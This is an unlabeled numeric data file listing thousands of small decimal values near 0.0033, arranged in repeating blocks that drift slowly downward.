0.00344038
0.0034342
0.00344021
0.00343463
0.00343423
0.0034271
0.0034213
0.00342746
0.00342108
0.00342721
0.00342709
0.00342145
0.00343446
0.00344022
0.00344011
0.00343433
0.00344012
0.00343406
0.00343431
0.00342718
0.00342732
0.00342162
0.00342121
0.00342721
0.00342734
0.00342159
0.00345326
0.0034534
0.00344766
0.00344728
0.00345327
0.00345344
0.00344764
0.00346055
0.00346622
0.00346629
0.00346051
0.00346041
0.00346622
0.00346012
0.00346069
0.00346029
0.00346632
0.0034665
0.00346071
0.00346631
0.00346034
0.00345317
0.00344709
0.00345362
0.00344735
0.00345317
0.00345326
0.0034475
0.0034346
0.00344038
0.00344023
0.00343421
0.00344021
0.00343423
0.00343463
0.0034271
0.0034213
0.00342746
0.00342108
0.00342145
0.00342709
0.00342721
0.00343446
0.00344022
0.00344011
0.00343433
0.00344012
0.00343431
0.00343407
0.00342718
0.00342732
0.00342121
0.00342162
0.00342159
0.00342734
0.00342721
0.0034346
0.00344023
0.00344038
0.00343421
0.00344021
0.00343463
0.00343423
0.0034271
0.0034213
0.00342746
0.00342108
0.00342721
0.00342709
0.00342145
0.00343446
0.00344022
0.00344011
0.00343433
0.00344012
0.00343406
0.00343431
0.00342718
0.00342732
0.00342162
0.00342121
0.00342721
0.00342734
0.00342159
0.00345328
0.00345271
0.00344739
0.00344739
0.00345306
0.00345306
0.00344719
0.00343414
0.0034347
0.00344001
0.00344001
0.00343435
0.00344021
0.00343435
0.00345326
0.00345339
0.00344766
0.00344727
0.00345327
0.00345344
0.00344764
0.00346055
0.00346622
0.00346629
0.00346051
0.00346041
0.00346622
0.00346012
0.00346069
0.00346029
0.00346631
0.0034665
0.00346071
0.0034663
0.00346034
0.00345317
0.00344709
0.00345362
0.00344735
0.00345316
0.00345326
0.0034475
0.0034346
0.00344023
0.00344037
0.0034342
0.00344021
0.00343462
0.00343422
0.0034271
0.0034213
0.00342746
0.00342108
0.00342145
0.00342709
0.00342721
0.00343446
0.00344022
0.00344011
0.00343433
0.00344012
0.00343431
0.00343406
0.00342718
0.00342732
0.00342162
0.00342121
0.00342159
0.00342721
0.00342734
0.0034346
0.00344023
0.00344037
0.0034342
0.00344021
0.00343462
0.00343422
0.0034271
0.0034213
0.00342746
0.00342108
0.00342721
0.00342709
0.00342145
0.00343446
0.00344022
0.00344011
0.00343433
0.00344012
0.00343406
0.00343431
0.00342718
0.00342732
0.00342162
0.00342121
0.00342721
0.00342734
0.00342159
0.00343415
0.0034347
0.00344001
0.00344002
0.00344022
0.00343435
0.00343436
0.00340127
0.00340082
0.00339551
0.00339551
0.0033953
0.00340111
0.00340111
0.00338249
0.0033831
0.00338827
0.00338827
0.00338842
0.0033827
0.00338271
0.00340128
0.00340142
0.00339536
0.00339578
0.00340142
0.00340131
0.00339574
0.0034085
0.00341411
0.00341424
0.00340831
0.00340814
0.00341412
0.00340835
0.00340863
0.00340825
0.00341435
0.00341423
0.00340825
0.0034142
0.00340867
0.00340121
0.00339527
0.00340149
0.00339547
0.00340133
0.00340119
0.00339562
0.00340128
0.00340142
0.00339537
0.00339578
0.00340142
0.00340131
0.00339575
0.0034085
0.00341411
0.00341424
0.00340831
0.00341412
0.00340814
0.00340835
0.00340864
0.00340825
0.00341435
0.00341423
0.0034142
0.00340826
0.00340867
0.00340121
0.00339527
0.0034015
0.00339547
0.00340133
0.00339562
0.00340119
0.00338293
0.00338856
0.00338846
0.00338256
0.00338843
0.00338255
0.00338297
0.0033756
0.00336994
0.00337584
0.00336977
0.00337558
0.00337574
0.00337009
0.00338281
0.0033885
0.00338835
0.00338259
0.00338266
0.00338836
0.00338248
0.00337567
0.0033758
0.00336982
0.00337023
0.00337579
0.00337569
0.0033702
0.00338293
0.00338856
0.00338846
0.00338256
0.00338844
0.00338255
0.00338297
0.0033756
0.00336994
0.00337584
0.00336977
0.00337574
0.00337559
0.00337009
0.00338281
0.0033885
0.00338835
0.00338259
0.00338837
0.00338248
0.00338266
0.00337567
0.0033758
0.00336983
0.00337024
0.00337579
0.00337569
0.0033702
0.00340127
0.00340082
0.00339551
0.00339551
0.00340111
0.0034011
0.0033953
0.00338249
0.0033831
0.00338827
0.00338827
0.0033827
0.00338842
0.00338271
0.00340128
0.00340142
0.00339536
0.00339578
0.00340142
0.00340131
0.00339574
0.0034085
0.00341411
0.00341424
0.00340831
0.00340814
0.00341412
0.00340835
0.00340863
0.00340825
0.00341435
0.00341423
0.00340825
0.0034142
0.00340867
0.00340121
0.00339527
0.0034015
0.00339547
0.00340133
0.00340119
0.00339562
0.00340128
0.00340142
0.00339578
0.00339536
0.00340131
0.00340142
0.00339574
0.0034085
0.0034141
0.00341424
0.00340831
0.00341412
0.00340814
0.00340835
0.00340863
0.00340825
0.00341423
0.00341435
0.0034142
0.00340867
0.00340825
0.00340121
0.00339527
0.00340149
0.00339547
0.00340133
0.00339562
0.00340119
0.00338293
0.00338856
0.00338846
0.00338256
0.00338843
0.00338255
0.00338296
0.0033756
0.00336994
0.00337584
0.00336977
0.00337558
0.00337574
0.00337009
0.00338281
0.0033885
0.00338835
0.00338259
0.00338266
0.00338836
0.00338248
0.00337567
0.0033758
0.00336982
0.00337023
0.00337579
0.00337569
0.0033702
0.00338293
0.00338846
0.00338856
0.00338256
0.00338843
0.00338296
0.00338255
0.0033756
0.00336994
0.00337584
0.00336977
0.00337574
0.00337558
0.00337009
0.00338281
0.0033885
0.00338835
0.00338259
0.00338836
0.00338248
0.00338266
0.00337567
0.0033758
0.00337023
0.00336982
0.00337569
0.00337579
0.0033702
0.00340128
0.00340142
0.00339578
0.00339536
0.00340131
0.00340142
0.00339574
0.0034085
0.00341411
0.00341424
0.00340831
0.00340835
0.00341412
0.00340814
0.00340863
0.00340825
0.00341423
0.00341435
0.00340867
0.0034142
0.00340826
0.00340121
0.00339527
0.0034015
0.00339547
0.00340119
0.00340133
0.00339562
0.00338293
0.00338856
0.00338846
0.00338256
0.00338844
0.00338255
0.00338296
0.0033756
0.00336994
0.00337584
0.00336977
0.00337009
0.00337558
0.00337574
0.00338281
0.0033885
0.00338835
0.00338259
0.00338837
0.00338266
0.00338248
0.00337567
0.0033758
0.00336982
0.00337023
0.0033702
0.00337579
0.00337569
0.00338293
0.00338846
0.00338856
0.00338256
0.00338844
0.00338296
0.00338255
0.0033756
0.00336994
0.00337584
0.00336977
0.00337574
0.00337558
0.00337009
0.00338281
0.0033885
0.00338835
0.00338259
0.00338836
0.00338248
0.00338266
0.00337567
0.0033758
0.00337023
0.00336982
0.00337569
0.00337579
0.0033702
0.00340127
0.00340082
0.00339551
0.00339552
0.00340111
0.0034011
0.0033953
0.00338249
0.0033831
0.00338826
0.00338827
0.0033827
0.00338842
0.00338271
0.00340128
0.00340142
0.00339578
0.00339536
0.00340131
0.00340142
0.00339574
0.0034085
0.00341411
0.00341424
0.00340831
0.00340835
0.00341412
0.00340814
0.00340863
0.00340825
0.00341423
0.00341435
0.00340867
0.0034142
0.00340825
0.00340121
0.00339527
0.0034015
0.00339547
0.00340119
0.00340133
0.00339562
0.00338293
0.00338846
0.00338856
0.00338256
0.00338843
0.00338296
0.00338255
0.0033756
0.00336994
0.00337584
0.00336977
0.00337009
0.00337558
0.00337574
0.00338281
0.0033885
0.00338835
0.00338259
0.00338836
0.00338266
0.00338248
0.00337567
0.0033758
0.00337023
0.00336982
0.0033702
0.00337569
0.00337579
0.00338293
0.00338846
0.00338856
0.00338256
0.00338843
0.00338296
0.00338255
0.0033756
0.00336994
0.00337584
0.00336977
0.00337574
0.00337558
0.00337009
0.00338281
0.0033885
0.00338835
0.00338259
0.00338836
0.00338248
0.00338266
0.00337567
0.0033758
0.00337023
0.00336982
0.00337569
0.00337579
0.0033702
0.00338249
0.0033831
0.00338827
0.00338827
0.00338842
0.00338271
0.00338271
0.00335039
0.00335001
0.00334481
0.00334481
0.00334461
0.00335026
0.00335026
0.00333217
0.00333277
0.00333777
0.00333777
0.0033379
0.00333237
0.00333237
0.00335039
0.00335052
0.00334464
0.00334504
0.00335051
0.00335042
0.00334501
0.00335746
0.00336291
0.00336307
0.00335721
0.00335715
0.00336293
0.0033573
0.00335756
0.0033572
0.0033631
0.00336301
0.00335719
0.00336299
0.00335759
0.00335034
0.00334462
0.00335055
0.00334476
0.00335049
0.00335033
0.00334491
0.00335039
0.00335052
0.00334464
0.00334504
0.00335051
0.00335042
0.00334501
0.00335746
0.00336291
0.00336307
0.00335721
0.00336293
0.00335715
0.0033573
0.00335756
0.0033572
0.0033631
0.00336301
0.00336299
0.00335719
0.00335759
0.00335035
0.00334462
0.00335055
0.00334476
0.00335049
0.00334492
0.00335033
0.00333255
0.00333801
0.00333792
0.0033322
0.0033379
0.00333219
0.00333258
0.00332545
0.00331996
0.00332563
0.00331983
0.00332544
0.0033256
0.00332011
0.00333246
0.003338
0.00333783
0.0033322
0.00333231
0.00333785
0.00333218
0.00332549
0.00332561
0.00331983
0.00332022
0.0033256
0.00332551
0.00332019
0.00333255
0.00333801
0.00333792
0.0033322
0.0033379
0.00333219
0.00333258
0.00332546
0.00331996
0.00332563
0.00331983
0.00332561
0.00332544
0.00332011
0.00333247
0.003338
0.00333783
0.0033322
0.00333785
0.00333218
0.00333231
0.00332549
0.00332561
0.00331983
0.00332022
0.0033256
0.00332551
0.00332019
0.00335039
0.00335001
0.00334481
0.00334481
0.00335026
0.00335026
0.00334461
0.00333217
0.00333277
0.00333777
0.00333777
0.00333237
0.0033379
0.00333237
0.00335039
0.00335052
0.00334464
0.00334504
0.00335051
0.00335042
0.00334501
0.00335746
0.00336291
0.00336307
0.00335721
0.00335715
0.00336293
0.0033573
0.00335756
0.0033572
0.0033631
0.00336301
0.00335719
0.00336298
0.00335759
0.00335034
0.00334462
0.00335055
0.00334476
0.00335049
0.00335032
0.00334491
0.00335039
0.00335052
0.00334504
0.00334464
0.00335042
0.00335051
0.00334501
0.00335746
0.00336291
0.00336307
0.00335721
0.00336293
0.00335715
0.0033573
0.00335756
0.0033572
0.00336301
0.0033631
0.00336298
0.00335759
0.00335719
0.00335034
0.00334462
0.00335055
0.00334476
0.00335049
0.00334491
0.00335032
0.00333255
0.00333801
0.00333792
0.0033322
0.0033379
0.00333219
0.00333258
0.00332545
0.00331995
0.00332563
0.00331983
0.00332543
0.0033256
0.00332011
0.00333246
0.003338
0.00333783
0.0033322
0.00333231
0.00333785
0.00333218
0.00332549
0.00332561
0.00331983
0.00332022
0.0033256
0.00332551
0.00332019
0.00333255
0.00333792
0.00333801
0.0033322
0.0033379
0.00333258
0.00333219
0.00332545
0.00331995
0.00332563
0.00331983
0.0033256
0.00332543
0.00332011
0.00333246
0.003338
0.00333783
0.0033322
0.00333785
0.00333218
0.00333231
0.00332549
0.00332561
0.00332022
0.00331983
0.00332551
0.0033256
0.00332019
0.00335039
0.00335052
0.00334504
0.00334464
0.00335042
0.00335051
0.00334501
0.00335746
0.00336291
0.00336307
0.00335721
0.0033573
0.00336293
0.00335715
0.00335756
0.0033572
0.00336301
0.0033631
0.00335759
0.00336299
0.00335719
0.00335034
0.00334462
0.00335055
0.00334476
0.00335032
0.00335049
0.00334491
0.00333255
0.00333801
0.00333792
0.0033322
0.0033379
0.00333219
0.00333258
0.00332545
0.00331996
0.00332563
0.00331983
0.00332011
0.00332543
0.0033256
0.00333246
0.003338
0.00333783
0.0033322
0.00333785
0.00333231
0.00333218
0.00332549
0.00332561
0.00331983
0.00332022
0.00332019
0.0033256
0.00332551
0.00333255
0.00333792
0.00333801
0.0033322
0.0033379
0.00333258
0.00333219
0.00332545
0.00331996
0.00332563
0.00331983
0.0033256
0.00332543
0.00332011
0.00333246
0.003338
0.00333783
0.0033322
0.00333785
0.00333218
0.00333231
0.00332549
0.00332561
0.00332022
0.00331983
0.00332551
0.0033256
0.00332019
0.00335039
0.00335001
0.00334481
0.00334481
0.00335026
0.00335026
0.00334461
0.00333217
0.00333277
0.00333777
0.00333777
0.00333237
0.0033379
0.00333237
0.00335039
0.00335052
0.00334504
0.00334464
0.00335042
0.00335051
0.00334501
0.00335746
0.00336291
0.00336307
0.00335721
0.0033573
0.00336293
0.00335715
0.00335756
0.0033572
0.00336301
0.0033631
0.00335759
0.00336298
0.00335719
0.00335034
0.00334462
0.00335055
0.00334476
0.00335032
0.00335049
0.00334491
0.00333255
0.00333792
0.00333801
0.0033322
0.0033379
0.00333258
0.00333219
0.00332545
0.00331995
0.00332563
0.00331983
0.00332011
0.00332543
0.0033256
0.00333246
0.003338
0.00333783
0.0033322
0.00333785
0.00333231
0.00333218
0.00332549
0.00332561
0.00332022
0.00331983
0.00332019
0.00332551
0.0033256
0.00333255
0.00333792
0.00333801
0.0033322
0.0033379
0.00333258
0.00333219
0.00332545
0.00331996
0.00332563
0.00331983
0.0033256
0.00332543
0.00332011
0.00333246
0.003338
0.00333783
0.0033322
0.00333785
0.00333218
0.00333231
0.00332549
0.00332561
0.00332022
0.00331983
0.00332551
0.0033256
0.00332019
0.00333217
0.00333277
0.00333777
0.00333777
0.0033379
0.00333237
0.00333237
0.00330098
0.00330063
0.00329559
0.00329559
0.00329541
0.00330086
0.00330086
0.00328333
0.0032839
0.00328874
0.00328874
0.00328886
0.00328351
0.00328351
0.00330096
0.00330107
0.0032954
0.00329576
0.00330106
0.00330098
0.00329574
0.00330784
0.00331313
0.0033133
0.00330757
0.00330757
0.00331315
0.00330769
0.00330792
0.00330758
0.00331329
0.0033132
0.00330757
0.00331318
0.00330795
0.00330093
0.00329541
0.00330109
0.00329552
0.00330109
0.00330091
0.00329567
0.00330096
0.00330107
0.0032954
0.00329576
0.00330107
0.00330098
0.00329574
0.00330784
0.00331313
0.0033133
0.00330757
0.00331315
0.00330758
0.00330769
0.00330792
0.00330758
0.00331329
0.0033132
0.00331318
0.00330757
0.00330795
0.00330093
0.00329541
0.00330108
0.00329552
0.00330109
0.00329567
0.00330091
0.00328365
0.00328894
0.00328885
0.00328332
0.00328883
0.00328332
0.00328367
0.00327677
0.00327144
0.00327691
0.00327134
0.00327675
0.00327693
0.00327159
0.00328359
0.00328896
0.00328879
0.00328332
0.00328344
0.00328881
0.00328333
0.00327679
0.0032769
0.00327132
0.00327167
0.00327689
0.0032768
0.00327165
0.00328365
0.00328893
0.00328885
0.00328332
0.00328883
0.00328332
0.00328367
0.00327677
0.00327144
0.00327691
0.00327134
0.00327693
0.00327675
0.00327159
0.00328359
0.00328896
0.00328879
0.00328331
0.00328881
0.00328333
0.00328343
0.00327679
0.0032769
0.00327132
0.00327167
0.00327689
0.0032768
0.00327165
0.00330098
0.00330063
0.00329558
0.00329559
0.00330086
0.00330086
0.0032954
0.00328333
0.0032839
0.00328874
0.00328874
0.0032835
0.00328886
0.00328351
0.00330096
0.00330108
0.0032954
0.00329576
0.00330106
0.00330098
0.00329574
0.00330784
0.00331313
0.0033133
0.00330757
0.00330758
0.00331315
0.00330769
0.00330792
0.00330758
0.00331329
0.0033132
0.00330757
0.00331318
0.00330795
0.00330093
0.00329541
0.00330109
0.00329552
0.00330109
0.00330091
0.00329567
0.00330096
0.00330108
0.00329576
0.0032954
0.00330098
0.00330106
0.00329574
0.00330784
0.00331313
0.0033133
0.00330757
0.00331315
0.00330758
0.00330769
0.00330792
0.00330758
0.0033132
0.00331329
0.00331318
0.00330795
0.00330757
0.00330093
0.00329541
0.00330109
0.00329552
0.00330109
0.00329567
0.00330091
0.00328365
0.00328894
0.00328885
0.00328332
0.00328883
0.00328332
0.00328367
0.00327677
0.00327144
0.00327691
0.00327134
0.00327675
0.00327693
0.00327159
0.00328359
0.00328896
0.00328879
0.00328332
0.00328343
0.00328881
0.00328333
0.00327679
0.0032769
0.00327132
0.00327167
0.00327689
0.0032768
0.00327165
0.00328365
0.00328885
0.00328894
0.00328332
0.00328883
0.00328367
0.00328332
0.00327677
0.00327144
0.00327691
0.00327134
0.00327693
0.00327675
0.00327159
0.00328359
0.00328896
0.00328879
0.00328331
0.00328881
0.00328333
0.00328343
0.00327679
0.0032769
0.00327167
0.00327132
0.0032768
0.00327689
0.00327165
0.00330096
0.00330108
0.00329577
0.0032954
0.00330098
0.00330107
0.00329574
0.00330784
0.00331313
0.0033133
0.00330757
0.00330769
0.00331315
0.00330758
0.00330792
0.00330758
0.0033132
0.00331329
0.00330795
0.00331318
0.00330757
0.00330093
0.00329541
0.00330109
0.00329552
0.00330091
0.00330109
0.00329567
0.00328365
0.00328894
0.00328885
0.00328332
0.00328883
0.00328332
0.00328367
0.00327677
0.00327144
0.00327691
0.00327135
0.00327159
0.00327675
0.00327693
0.00328359
0.00328896
0.00328879
0.00328332
0.00328881
0.00328344
0.00328334
0.00327679
0.0032769
0.00327132
0.00327167
0.00327165
0.0032769
0.0032768
0.00328365
0.00328885
0.00328894
0.00328332
0.00328883
0.00328367
0.00328332
0.00327677
0.00327144
0.00327691
0.00327134
0.00327693
0.00327675
0.00327159
0.00328359
0.00328896
0.00328879
0.00328332
0.00328881
0.00328334
0.00328344
0.00327679
0.0032769
0.00327167
0.00327132
0.0032768
0.0032769
0.00327165
0.00330098
0.00330063
0.00329559
0.00329559
0.00330086
0.00330086
0.00329541
0.00328333
0.0032839
0.00328874
0.00328874
0.00328351
0.00328886
0.00328351
0.00330096
0.00330108
0.00329576
0.0032954
0.00330098
0.00330107
0.00329574
0.00330784
0.00331313
0.0033133
0.00330757
0.00330769
0.00331315
0.00330758
0.00330792
0.00330758
0.0033132
0.00331329
0.00330794
0.00331318
0.00330757
0.00330093
0.00329541
0.00330109
0.00329552
0.00330091
0.00330109
0.00329567
0.00328365
0.00328885
0.00328894
0.00328332
0.00328883
0.00328367
0.00328332
0.00327677
0.00327144
0.00327691
0.00327134
0.00327159
0.00327675
0.00327693
0.00328359
0.00328896
0.00328879
0.00328331
0.00328881
0.00328343
0.00328333
0.00327679
0.0032769
0.00327167
0.00327132
0.00327165
0.0032768
0.00327689
0.00328365
0.00328885
0.00328894
0.00328332
0.00328883
0.00328367
0.00328332
0.00327677
0.00327144
0.00327691
0.00327134
0.00327693
0.00327675
0.00327159
0.00328359
0.00328896
0.00328879
0.00328332
0.00328881
0.00328334
0.00328344
0.00327679
0.0032769
0.00327167
0.00327132
0.0032768
0.00327689
0.00327165
0.00328333
0.0032839
0.00328874
0.00328874
0.00328886
0.00328351
0.00328351
0.003253
0.00325267
0.00324777
0.00324777
0.00324761
0.00325289
0.00325289
0.00323586
0.00323639
0.0032411
0.0032411
0.00324121
0.00323601
0.00323601
0.00325295
0.00325307
0.00324758
0.00324791
0.00325306
0.00325297
0.00324789
0.00325968
0.0032648
0.00326497
0.0032594
0.00325944
0.00326482
0.00325952
0.00325973
0.00325941
0.00326494
0.00326485
0.00325941
0.00326483
0.00325975
0.00325295
0.00324761
0.00325308
0.00324769
0.0032531
0.00325293
0.00324784
0.00325295
0.00325307
0.00324758
0.00324791
0.00325306
0.00325297
0.00324789
0.00325968
0.0032648
0.00326497
0.0032594
0.00326482
0.00325944
0.00325952
0.00325973
0.00325941
0.00326494
0.00326485
0.00326483
0.00325941
0.00325975
0.00325295
0.00324761
0.00325308
0.00324769
0.0032531
0.00324784
0.00325293
0.00323613
0.00324127
0.00324117
0.00323582
0.00324116
0.00323583
0.00323615
0.00322944
0.00322425
0.00322956
0.00322418
0.00322942
0.0032296
0.0032244
0.00323609
0.00324131
0.00324114
0.00323582
0.00323593
0.00324116
0.00323586
0.00322944
0.00322955
0.00322415
0.00322446
0.00322955
0.00322945
0.00322444
0.00323613
0.00324127
0.00324117
0.00323582
0.00324116
0.00323583
0.00323615
0.00322944
0.00322425
0.00322956
0.00322418
0.0032296
0.00322942
0.0032244
0.00323609
0.00324131
0.00324114
0.00323582
0.00324116
0.00323586
0.00323593
0.00322944
0.00322955
0.00322415
0.00322446
0.00322955
0.00322945
0.00322444
0.003253
0.00325267
0.00324777
0.00324777
0.00325289
0.00325289
0.00324761
0.00323586
0.00323639
0.0032411
0.0032411
0.00323601
0.00324121
0.00323602
0.00325295
0.00325307
0.00324758
0.00324791
0.00325306
0.00325297
0.00324789
0.00325968
0.0032648
0.00326497
0.0032594
0.00325944
0.00326482
0.00325952
0.00325973
0.00325941
0.00326494
0.00326485
0.00325941
0.00326483
0.00325975
0.00325295
0.00324761
0.00325308
0.00324769
0.0032531
0.00325293
0.00324784
0.00325295
0.00325307
0.00324791
0.00324758
0.00325297
0.00325306
0.00324789
0.00325967
0.0032648
0.00326497
0.0032594
0.00326482
0.00325944
0.00325952
0.00325973
0.00325941
0.00326485
0.00326494
0.00326483
0.00325975
0.00325941
0.00325295
0.00324761
0.00325308
0.00324769
0.0032531
0.00324784
0.00325293
0.00323613
0.00324127
0.00324117
0.00323582
0.00324116
0.00323583
0.00323615
0.00322944
0.00322425
0.00322956
0.00322418
0.00322942
0.0032296
0.0032244
0.00323609
0.00324131
0.00324114
0.00323582
0.00323593
0.00324116
0.00323586
0.00322944
0.00322955
0.00322415
0.00322446
0.00322955
0.00322945
0.00322444
0.00323613
0.00324117
0.00324127
0.00323582
0.00324116
0.00323615
0.00323583
0.00322944
0.00322425
0.00322956
0.00322418
0.0032296
0.00322942
0.0032244
0.00323609
0.00324131
0.00324114
0.00323582
0.00324116
0.00323586
0.00323593
0.00322944
0.00322955
0.00322446
0.00322415
0.00322945
0.00322955
0.00322444
0.00325296
0.00325307
0.00324791
0.00324758
0.00325297
0.00325307
0.00324789
0.00325968
0.0032648
0.00326498
0.00325941
0.00325952
0.00326482
0.00325944
0.00325973
0.00325941
0.00326485
0.00326494
0.00325975
0.00326483
0.00325941
0.00325295
0.00324761
0.00325308
0.00324769
0.00325293
0.00325311
0.00324784
0.00323613
0.00324127
0.00324117
0.00323582
0.00324116
0.00323583
0.00323615
0.00322944
0.00322425
0.00322957
0.00322419
0.0032244
0.00322943
0.0032296
0.00323609
0.00324131
0.00324114
0.00323582
0.00324116
0.00323593
0.00323586
0.00322944
0.00322955
0.00322415
0.00322446
0.00322444
0.00322955
0.00322945
0.00323613
0.00324117
0.00324127
0.00323582
0.00324116
0.00323615
0.00323583
0.00322944
0.00322425
0.00322957
0.00322418
0.0032296
0.00322943
0.0032244
0.00323609
0.00324131
0.00324114
0.00323582
0.00324116
0.00323586
0.00323593
0.00322944
0.00322955
0.00322446
0.00322415
0.00322945
0.00322955
0.00322444
0.003253
0.00325267
0.00324777
0.00324777
0.00325289
0.00325289
0.00324761
0.00323586
0.00323639
0.0032411
0.0032411
0.00323601
0.00324121
0.00323602
0.00325296
0.00325307
0.00324791
0.00324758
0.00325297
0.00325307
0.00324789
0.00325968
0.0032648
0.00326498
0.0032594
0.00325952
0.00326482
0.00325944
0.00325973
0.00325941
0.00326485
0.00326494
0.00325975
0.00326483
0.00325941
0.00325295
0.00324761
0.00325308
0.00324769
0.00325293
0.00325311
0.00324784
0.00323613
0.00324117
0.00324127
0.00323582
0.00324116
0.00323615
0.00323583
0.00322944
0.00322425
0.00322956
0.00322418
0.0032244
0.00322942
0.0032296
0.00323609
0.00324131
0.00324114
0.00323582
0.00324116
0.00323593
0.00323586
0.00322944
0.00322955
0.00322446
0.00322415
0.00322444
0.00322945
0.00322955
0.00323613
0.00324117
0.00324127
0.00323582
0.00324116
0.00323615
0.00323583
0.00322944
0.00322425
0.00322957
0.00322418
0.0032296
0.00322943
0.0032244
0.00323609
0.00324131
0.00324114
0.00323582
0.00324116
0.00323586
0.00323593
0.00322944
0.00322955
0.00322446
0.00322415
0.00322945
0.00322955
0.00322444
0.00323586
0.00323639
0.0032411
0.0032411
0.00324121
0.00323602
0.00323602
0.00320628
0.00320596
0.00320118
0.00320118
0.00320104
0.00320616
0.00320616
0.00318957
0.00319007
0.00319465
0.00319465
0.00319477
0.0031897
0.0031897
0.00320621
0.00320633
0.003201
0.0032013
0.00320633
0.00320623
0.00320128
0.00321279
0.00321778
0.00321795
0.00321253
0.00321258
0.0032178
0.00321264
0.00321283
0.00321254
0.00321791
0.0032178
0.00321254
0.00321779
0.00321284
0.00320622
0.00320104
0.00320634
0.00320109
0.00320638
0.0032062
0.00320125
0.00320622
0.00320633
0.003201
0.0032013
0.00320633
0.00320623
0.00320128
0.00321279
0.00321778
0.00321795
0.00321253
0.0032178
0.00321258
0.00321264
0.00321283
0.00321254
0.00321791
0.0032178
0.00321779
0.00321254
0.00321284
0.00320622
0.00320104
0.00320634
0.00320109
0.00320638
0.00320125
0.0032062
0.0031898
0.00319482
0.00319471
0.00318952
0.0031947
0.00318953
0.00318981
0.00318326
0.00317819
0.00318338
0.00317815
0.00318325
0.00318342
0.00317835
0.00318977
0.00319487
0.0031947
0.00318951
0.00318961
0.00319471
0.00318956
0.00318325
0.00318337
0.00317811
0.00317839
0.00318337
0.00318326
0.00317838
0.0031898
0.00319482
0.00319471
0.00318952
0.0031947
0.00318953
0.00318981
0.00318326
0.00317819
0.00318338
0.00317815
0.00318342
0.00318325
0.00317835
0.00318977
0.00319487
0.0031947
0.00318951
0.00319471
0.00318956
0.00318961
0.00318325
0.00318337
0.00317811
0.00317839
0.00318337
0.00318326
0.00317838
0.00320628
0.00320596
0.00320118
0.00320118
0.00320616
0.00320616
0.00320104
0.00318957
0.00319007
0.00319465
0.00319465
0.0031897
0.00319477
0.0031897
0.00320622
0.00320633
0.003201
0.00320129
0.00320633
0.00320623
0.00320128
0.00321279
0.00321778
0.00321795
0.00321253
0.00321258
0.0032178
0.00321264
0.00321283
0.00321254
0.00321791
0.0032178
0.00321254
0.00321779
0.00321284
0.00320622
0.00320104
0.00320634
0.00320109
0.00320638
0.00320621
0.00320125
0.00320621
0.00320633
0.0032013
0.003201
0.00320623
0.00320633
0.00320128
0.00321279
0.00321778
0.00321795
0.00321253
0.0032178
0.00321258
0.00321264
0.00321283
0.00321254
0.0032178
0.00321791
0.00321779
0.00321284
0.00321254
0.00320622
0.00320104
0.00320634
0.00320109
0.00320638
0.00320125
0.0032062
0.0031898
0.00319482
0.00319471
0.00318952
0.0031947
0.00318953
0.00318981
0.00318326
0.00317819
0.00318338
0.00317815
0.00318325
0.00318342
0.00317835
0.00318977
0.00319487
0.0031947
0.00318951
0.00318961
0.00319471
0.00318956
0.00318325
0.00318337
0.00317811
0.00317839
0.00318337
0.00318326
0.00317838
0.0031898
0.00319471
0.00319482
0.00318952
0.0031947
0.00318981
0.00318953
0.00318326
0.00317819
0.00318338
0.00317815
0.00318342
0.00318325
0.00317835
0.00318977
0.00319487
0.0031947
0.00318951
0.00319471
0.00318956
0.00318961
0.00318325
0.00318337
0.00317839
0.00317811
0.00318326
0.00318337
0.00317838
0.00320622
0.00320633
0.0032013
0.003201
0.00320623
0.00320633
0.00320128
0.00321279
0.00321778
0.00321795
0.00321253
0.00321264
0.0032178
0.00321258
0.00321283
0.00321254
0.0032178
0.00321791
0.00321284
0.00321779
0.00321254
0.00320622
0.00320104
0.00320634
0.00320109
0.00320621
0.00320638
0.00320125
0.0031898
0.00319482
0.00319471
0.00318952
0.0031947
0.00318953
0.00318981
0.00318326
0.0031782
0.00318338
0.00317815
0.00317835
0.00318325
0.00318342
0.00318977
0.00319487
0.0031947
0.00318951
0.00319471
0.00318961
0.00318956
0.00318325
0.00318337
0.00317811
0.00317839
0.00317838
0.00318337
0.00318326
0.0031898
0.00319471
0.00319482
0.00318952
0.0031947
0.00318981
0.00318953
0.00318326
0.00317819
0.00318338
0.00317815
0.00318342
0.00318325
0.00317835
0.00318977
0.00319487
0.0031947
0.00318951
0.00319471
0.00318956
0.00318961
0.00318325
0.00318337
0.00317839
0.00317811
0.00318326
0.00318337
0.00317838
0.00320628
0.00320596
0.00320118
0.00320118
0.00320616
0.00320616
0.00320104
0.00318957
0.00319007
0.00319465
0.00319465
0.0031897
0.00319477
0.0031897
0.00320622
0.00320633
0.00320129
0.003201
0.00320623
0.00320633
0.00320128
0.00321279
0.00321778
0.00321795
0.00321253
0.00321264
0.0032178
0.00321258
0.00321283
0.00321254
0.0032178
0.00321791
0.00321284
0.00321779
0.00321254
0.00320622
0.00320104
0.00320634
0.00320109
0.00320621
0.00320638
0.00320125
0.0031898
0.00319471
0.00319482
0.00318952
0.0031947
0.00318981
0.00318953
0.00318326
0.00317819
0.00318338
0.00317815
0.00317835
0.00318325
0.00318342
0.00318977
0.00319487
0.0031947
0.00318951
0.00319471
0.00318961
0.00318956
0.00318325
0.00318337
0.00317839
0.00317811
0.00317838
0.00318326
0.00318337
0.0031898
0.00319471
0.00319482
0.00318952
0.0031947
0.00318981
0.00318953
0.00318326
0.00317819
0.00318338
0.00317815
0.00318342
0.00318325
0.00317835
0.00318977
0.00319487
0.0031947
0.00318951
0.00319471
0.00318956
0.00318961
0.00318325
0.00318337
0.00317839
0.00317811
0.00318326
0.00318337
0.00317838
0.00318957
0.00319007
0.00319465
0.00319465
0.00319477
0.0031897
0.0031897
0.0031606
0.00316029
0.00315564
0.00315562
0.00315551
0.00316049
0.00316049
0.00314426
0.00314472
0.00314921
0.00314921
0.00314932
0.00314439
0.00314438
0.00316053
0.00316065
0.00315546
0.00315571
0.00316065
0.00316054
0.0031557
0.00316699
0.00317186
0.00317203
0.00316674
0.00316679
0.00317187
0.00316683
0.00316701
0.00316674
0.00317199
0.00317187
0.00316676
0.00317186
0.00316702
0.00316054
0.00315549
0.00316066
0.00315553
0.00316069
0.00316053
0.00315568
0.00316053
0.00316065
0.00315546
0.00315571
0.00316065
0.00316054
0.0031557
0.00316698
0.00317186
0.00317203
0.00316674
0.00317187
0.00316679
0.00316683
0.00316701
0.00316674
0.00317199
0.00317187
0.00317186
0.00316676
0.00316702
0.00316054
0.00315549
0.00316065
0.00315552
0.00316069
0.00315568
0.00316053
0.00314445
0.00314938
0.00314925
0.00314419
0.00314925
0.00314421
0.00314446
0.00313803
0.00313306
0.00313815
0.00313303
0.00313802
